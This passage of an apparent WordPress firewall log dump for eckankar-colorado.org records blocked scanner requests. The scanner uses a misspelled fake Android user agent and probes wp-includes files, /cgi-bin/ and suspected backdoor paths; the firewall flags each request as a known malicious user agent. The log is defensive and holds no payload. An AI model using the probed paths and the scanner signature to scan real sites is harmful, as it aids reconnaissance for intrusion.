Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL2NsYXNzLXdwLXNpdGVtYXBzLWluZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134003,1699932320.731534,1699932320.722700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXBvc3Qtc3RhdHVzZXMtY29udHJvbGxlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134004,1699932316.047112,1699932316.038300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXBsdWdpbnMtY29udHJvbGxlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134005,1699932312.361119,1699932312.352200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-pattern-directory-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXBhdHRlcm4tZGlyZWN0b3J5LWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134109,1699994920.727743,1699994920.712500,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-previews.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXByZXZpZXdzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134009,1699932506.682057,1699932506.673300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps-provider.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL2NsYXNzLXdwLXNpdGVtYXBzLXByb3ZpZGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134006,1699932309.153405,1699932309.139400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-navigation-fallback-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LW5hdmlnYXRpb24tZmFsbGJhY2stY29udHJvbGxlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134007,1699932304.860557,1699932304.848000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-menus-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LW1lbnVzLWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134008,1699932511.349823,1699932511.341100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps-registry.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL2NsYXNzLXdwLXNpdGVtYXBzLXJlZ2lzdHJ5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134033,1699932877.357198,1699932877.341900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-media-audio.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LW1lZGlhLWF1ZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134101,1699994978.156783,1699994978.147500,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/.well-knownold/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3dub2xkLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134034,1699932872.330509,1699932872.321800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-links.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LWxpbmtzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134035,1699932869.082163,1699932869.073400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-custom-html.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LWN1c3RvbS1odG1sLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134036,1699932866.482676,1699932866.473900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-categories.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LWNhdGVnb3JpZXMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134100,1699994980.019883,1699994980.009900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/WordPressCore/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9Xb3JkUHJlc3NDb3JlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134037,1699932856.900150,1699932856.891400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-calendar.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LWNhbGVuZGFyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134038,1699932850.032488,1699932850.023800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-block.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LWJsb2NrLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134039,1699932846.316648,1699932846.301700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-archives.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LWFyY2hpdmVzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134040,1699932839.876288,1699932839.867500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-nav-menu-widget.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3AtbmF2LW1lbnUtd2lkZ2V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134099,1699994981.569968,1699994981.560600,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/.well-known/acme-challenge/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL2FjbWUtY2hhbGxlbmdlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134041,1699932834.113762,1699932834.104900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvd3AtaW5jbHVkZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134042,1699932824.342811,1699932824.334100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-templates.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXRlbXBsYXRlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134043,1699932819.561237,1699932819.550800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-previews.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXByZXZpZXdzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134098,1699994985.025441,1699994985.016700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/cgi-bin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4v\",\"category\":\"brute-force\",\"ssl\":1}'),(134044,1699932811.111726,1699932811.102400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-compat/sidebar.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLWNvbXBhdC9zaWRlYmFyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134045,1699932807.342390,1699932807.333100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-compat/header.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLWNvbXBhdC9oZWFkZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134046,1699932798.163748,1699932798.154500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-compat/header-embed.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; 